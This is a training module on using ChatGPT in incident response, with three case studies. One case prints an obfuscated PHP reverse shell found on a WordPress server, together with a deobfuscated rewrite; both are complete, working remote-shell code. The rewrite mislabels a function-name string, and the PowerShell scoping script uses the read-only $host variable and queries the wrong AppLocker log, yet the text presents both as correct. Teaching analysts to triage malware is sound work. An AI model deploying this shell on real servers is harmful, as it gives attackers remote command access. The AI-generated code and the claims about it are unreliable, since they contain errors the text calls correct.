Accelerating IR with Generative AI

AI offers a great chance for analysts to speed up incident response and lower key metrics like Mean Time to Resolution (MTTR). Even if your organization restricts AI, it's important for analysts to stay aware of both the positive and negative uses of AI technology.

This module covers four examples where ChatGPT helped speed up incident response and shows how AI tools can make the process faster.

Case Study 1: Summarizing Code

• IOC: Sysadmin identifies unauthorized local user brok3n on Windows system. Calls IR team.

• Analysis: Live system analysis reveals several files in %LOCALAPPDATA% \Temp.

• Analysis: One zipped file includes C# source code excerpts.

An incident response team was called to investigate a Windows 10 compromise after a system admin found an unauthorized user named "brok3n." During the investigation, they discovered files in the %LOCALAPPDATA%\Temp folder, including a zip file with C# program source code.

Reviewing an attacker's source code can help identify other compromised systems. However, not all incident responders know every programming language attackers use. This is where AI, like ChatGPT, can help by summarizing the code for us.

We gave ChatGPT some source code from the compromised system and asked it to explain what the C# code does when run on Windows, and to determine if it's malicious or harmless.

ChatGPT Response – Summarizing Code

For this query, ChatGPT returned a correct assessment of the C# source code, explaining in plain language what the C# source code does. This is a very powerful tool for analysts, allowing us to take source code in nearly any programming language and generate an explanation of what the source code does.

Use Case 2: Deobfuscating Attacker Code

• IOC: Helpdesk escalates alert that WordPress server keeps crashing after server restart.

• IOC: Sysadmin notes 100% CPU from Linux httpd process (Apache) across all server cores.

• IOC: Log analysis reveals frequent requests for /wp- includes/FkhDUPZ.php.

The incident response team was called after several signs of a problem. The first sign was users reporting that a WordPress server was down. Restarting the server fixed it temporarily, but users continued to call back with the same issue.

The Linux WordPress server's CPU is maxed out, mostly due to the Apache httpd process. The system admin checked the web server logs and found many requests for a suspicious page, /wp-includes/FkhDUPZ.php, which shouldn't be there. The incident response team then gathered logs and files, finding that the FkhDUPZ.php file had heavily-obfuscated code.

Code Deobfuscation Prompt

Assume the role of a cyber security incedient response analyst. 
You are reviewing the source code  for an obfuscated php source code file. 
You identified this unknown and unauthorized php file on a linux web server you 
suspect may be compromised by an attacker.

Deobfuscate the code to the simplest form. Explain what the code does in a summary
of not more than 3 sentences. Present a detailed analysis of the code as well, 
using bullets to explain major pieces of code functionality. 
Rewrite the code in deobfuscated form using PHP language

<?php 
$s = "s".chr(101)."t_".chr(116)."i".chr(109)."e_".chr(108)."i".chr(109)."i".chr(116);
$k = chr(48);
$a = chr(49).chr(50).chr(55).chr(46).chr(48).chr(46).chr(48).chr(46).chr(49); // CHANGE THIS
$p = chr(49).chr(50).chr(51).chr(52); // CHANGE THIS
$c = "/bin/sh -i";
$v = chr(48);

if (function_exists('pcntl_fork')) {
    if (pcntl_fork()) exit($k); // Parent exits
    posix_setsid();
    $v = chr(49);
}

chdir(chr(47));
umask(0);

$f = fsockopen($a, $p);
if (!$f) exit("ERROR: Can't connect to $a:$p");

$p = proc_open($c, [["pipe", chr(114)], ["pipe", chr(119)], ["pipe", chr(119)]], $t);
if (!is_resource($p)) exit("ERROR: Can't spawn shell");

stream_set_blocking($t[0], 0);
stream_set_blocking($t[1], 0);
stream_set_blocking($t[2], 0);
stream_set_blocking($f, 0);

while (true) {
    if (feof($f)) break;
    if (feof($t[1])) break;

    $r = [$f, $t[1], $t[2]];
    stream_select($r, $w = null, $e = null, null);

    if (in_array($f, $r)) {
        fwrite($t[0], fread($f, 1400));
    }
    if (in_array($t[1], $r)) {
        fwrite($f, fread($t[1], 1400));
    }
    if (in_array($t[2], $r)) {
        fwrite($f, fread($t[2], 1400));
    }
}

fclose($f);
foreach ($t as $i) fclose($i);
proc_close($p);

?>

ChatGPT can both explain and deobfuscate code. In this case, we asked it to act as an incident response analyst and to decode obfuscated PHP code, using clear markers and extra context (PHP, Linux web server) to guide its analysis.

In the next paragraph, we ask ChatGPT to simplify the code and give a brief 3-sentence summary of what it does. We also want a detailed breakdown and a rewritten version of the code that’s easier to understand.

ChatGPT Response – Deobfuscating Attacker Code

ChatGPT Deobfuscated Code

<?php 
$socketFile = "st_ite_limte";
$port = "1234"; 
$ipAddress = "127.0.0.1"; 
$command = "/bin/sh -i";
$exitCode = 0;

if (function_exists('pcntl_fork')) {
    if (pcntl_fork()) exit($exitCode); 
    posix_setsid();
    $exitCode = 1;
}

chdir('/');
umask(0);

$socket = fsockopen($ipAddress, $port);
if (!$socket) exit("ERROR: Can't connect to $ipAddress:$port");

$process = proc_open($command, [["pipe", "r"], ["pipe", "w"], ["pipe", "w"]], $pipes);
if (!is_resource($process)) exit("ERROR: Can't spawn shell");

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($socket, 0);

while (true) {
    if (feof($socket)) break;
    if (feof($pipes[1])) break;

    $read = [$socket, $pipes[1], $pipes[2]];
    stream_select($read, $write = null, $error = null, null);

    if (in_array($socket, $read)) {
        fwrite($pipes[0], fread($socket, 1400));
    }
    if (in_array($pipes[1], $read)) {
        fwrite($socket, fread($pipes[1], 1400));
    }
    if (in_array($pipes[2], $read)) {
        fwrite($socket, fread($pipes[2], 1400));
    }
}

fclose($socket);
foreach ($pipes as $pipe) fclose($pipe);
proc_close($process);

?>

Use Case 3: Automate Analysis with Scripting

• IOC: Windows 10 zero-day led to credential dumping and lateral movement

• Analysis: AppLocker logs indicate safe listing bypass by renaming Mimikatz to osk.exe.

• Scoping: Need to identify all hosts in domain that have run osk.exe.

The incident response team was called to handle a compromised Windows 10 system. They discovered a zero-day exploit that led to credential theft and movement across the network. Logs showed that the attackers bypassed Windows AppLocker by renaming the Mimikatz tool to osk.exe to avoid detection.

The incident response team should use the new IoC (attacker runs osk.exe) on all Windows 10 systems to find other breaches. A PowerShell script is ideal for this task, as it can use PowerShell remoting to check AppLocker logs for all executed programs.

We can ask ChatGPT to write code for this task using simple language:

Write a PowerShell script to read from a text file containing host names or IP addresses, one per line. For each host, use PowerShell remoting to interrogate the Windows Event Log for AppLocker, looking for any log messages that include the string osk. Make the script output a list of hosts where the search string is present in the AppLocker event log.

# Path to the text file containing hostnames or IP addresses
$hostsFile = "C:\path\to\hosts.txt"

# String to search for in the AppLocker log messages
$searchString = "osk"

# Path to the output file
$outputFile = "C:\path\to\output.txt"

# Read the list of hosts from the text file
$hosts = Get-Content -Path $hostsFile

# Initialize an empty list to store hosts where the search string is found
$foundHosts = @()

foreach ($host in $hosts) {
    # Try to use PowerShell remoting to run a command on the remote host
    try {
        # Define the script block to run on the remote host
        $scriptBlock = {
            # Get the AppLocker log events
            $events = Get-WinEvent -LogName "Microsoft-Windows-AppLocker/MSI and Script" -ErrorAction Stop

            # Search for the string in the log messages
            $events | Where-Object { $_.Message -like "*$using:searchString*" }
        }

        # Run the script block on the remote host
        $results = Invoke-Command -ComputerName $host -ScriptBlock $scriptBlock -ErrorAction Stop

        # Check if any results are returned
        if ($results) {
            # Add the host to the list of found hosts
            $foundHosts += $host
        }
    } catch {
        # Handle any errors (e.g., connection issues)
        Write-Warning "Failed to query $host: $_"
    }
}

# Write the list of hosts where the search string was found to the output file
$foundHosts | Out-File -FilePath $outputFile

# Optionally, output to the console
Write-Output "Hosts where '$searchString' was found in AppLocker logs:"
$foundHosts

Notes:

1. Path to hosts.txt: Update C:\path\to\hosts.txt to the actual path where your text file with hostnames/IP addresses is located.

2. Output File Path: Update C:\path\to\output.txt to the desired path for your output file.

3. Permissions: Ensure you have the necessary permissions to use PowerShell remoting and query the Windows Event Log on the remote hosts.

4. PowerShell Remoting: Make sure PowerShell remoting is enabled on the remote hosts. You may need to adjust the execution policy and configure TrustedHosts if dealing with a non-domain environment.

This script will check each host for the presence of the string osk in AppLocker logs and output the hosts that contain this string to a specified file and also to the console.

The PowerShell script isn't very complex and could be improved for performance, but it works as needed. ChatGPT provided a script that met the incident response team's requirements, helping them effectively scope their Windows systems.